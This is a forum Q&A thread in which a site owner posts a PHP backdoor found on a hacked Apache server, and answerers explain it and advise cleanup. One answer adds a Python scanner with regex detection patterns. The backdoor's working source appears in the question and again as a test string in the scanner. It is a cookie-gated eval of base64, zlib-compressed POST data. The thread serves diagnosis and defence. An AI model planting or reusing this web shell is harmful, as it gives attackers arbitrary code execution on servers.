PHP code help - hacked apache server

Tags: php

I have discovered the following code appearing in two identical .php files on more than one of my server's websites. The files have inconspicuous names such as "reminder.php" (but a different name every time) and appear in my /scripts/ and /uploads/ folders, sometimes in other folders instead.

Their appearance is not entirely random, but I don't know enough about Apache servers or PHP to know a) how it got there, or b) what it does.

Checking the logs they all appeared at similar times and were called once and that is all.

Any help would be greatly appreciated.

<?php
// Only responds when the request carries the "adm" cookie
if (isset($_COOKIE["adm"])) {
    if (isset($_POST['crc'], $_POST['cmd'])) {
        // The POSTed "crc" must match the CRC32 of the payload, otherwise ask for a resend
        if (sprintf('%u', crc32($_POST['cmd'])) == $_POST['crc']) {
            // The payload is base64-encoded, zlib-compressed PHP, executed directly on the server
            eval(gzuncompress(base64_decode($_POST['cmd'])));
        } else
            echo "repeat_cmd";
    }
}
Duncan asked Jul 23 '11 00:07



2 Answers

The file allows malicious person(s) to execute any PHP code they want on your system.

Basically, if certain validations have been met (i.e. the malicious person has that given cookie value), it will take the POSTed "cmd", base64 decode it, gzip uncompress it, and evaluate it as PHP.

I'd recommend changing your passwords, and maybe reinstalling apache for good measure. Remove these files immediately as well, or if at all remotely possible, restore from a backup.

Cyclone answered Sep 25 '22 02:09
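To find other copies of this kind of file on a server, here is a small scanner I would run over the document root (added example, not part of the original question or either answer). It looks for the indicators visible in the posted code: eval() fed a decode/decompress chain, eval() fed raw request data, and the isset($_COOKIE[...]) gate, which is only reported alongside an eval hit because cookie checks are common in benign code. The sample document root it builds is constructed for the demo.

```python
import os
import re
import tempfile

# Indicators drawn from the dropper shown in the question. The cookie gate alone
# is common in legitimate code, so it is only reported when eval() is also present.
EVAL_DECODE_CHAIN = re.compile(r"eval\s*\(\s*(?:gzuncompress|gzinflate|base64_decode|str_rot13)\s*\(", re.I)
EVAL_ON_REQUEST = re.compile(r"eval\s*\([^;]*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I)
COOKIE_GATE = re.compile(r"isset\s*\(\s*\$_COOKIE\s*\[", re.I)

def classify_php_source(source: str) -> list:
    """Return the indicator names found in one PHP source (empty list = nothing eval-related)."""
    found = []
    if EVAL_DECODE_CHAIN.search(source):
        found.append("eval_decode_chain")
    if EVAL_ON_REQUEST.search(source):
        found.append("eval_on_request_input")
    if found and COOKIE_GATE.search(source):
        found.append("cookie_gate")
    return found

def scan_tree(root: str) -> dict:
    """Walk a document root; map each suspicious PHP file (relative path) to its indicators."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = classify_php_source(fh.read())
            if found:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = found
    return hits

# Constructed sample document root: a benign file that merely reads a cookie, and
# a file in uploads/ reproducing the backdoor from the question.
BENIGN = "<?php if (isset($_COOKIE['lang'])) { echo htmlspecialchars($_COOKIE['lang']); }"
BACKDOOR = ("<?php if (isset($_COOKIE['adm'])) { if (isset($_POST['crc'], $_POST['cmd'])) {"
            " if (sprintf('%u', crc32($_POST['cmd'])) == $_POST['crc']) {"
            " eval(gzuncompress(base64_decode($_POST['cmd']))); } else echo 'repeat_cmd'; } }")

def build_sample_docroot() -> str:
    root = tempfile.mkdtemp(prefix="docroot_")
    os.makedirs(os.path.join(root, "uploads"))
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write(BENIGN)
    with open(os.path.join(root, "uploads", "reminder.php"), "w") as fh:
        fh.write(BACKDOOR)
    return root
```

On a real host, call scan_tree() on the web root (for example /var/www) and compare the flagged file names against the access log entries the asker mentions; this is a triage aid, not a substitute for restoring from a known-clean backup.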


This code will execute (on the server) any arbitrary code it finds in the POST request if the key adm is present in the client's cookie. That request will be Base-64 encoded and encrypted to obfuscate its contents. Any code at all may be executed, including one to format your hard drive (if your PHP server is set to allow that).

You have been hacked. Take the server offline, right now. Get some help running an analysis before you wipe your host, if you can - you don't want to reinstall and go online, just to get hacked again. Changing all your passwords and locking down your server is a good start.

Michael Petrotta answered Sep 25 '22 02:09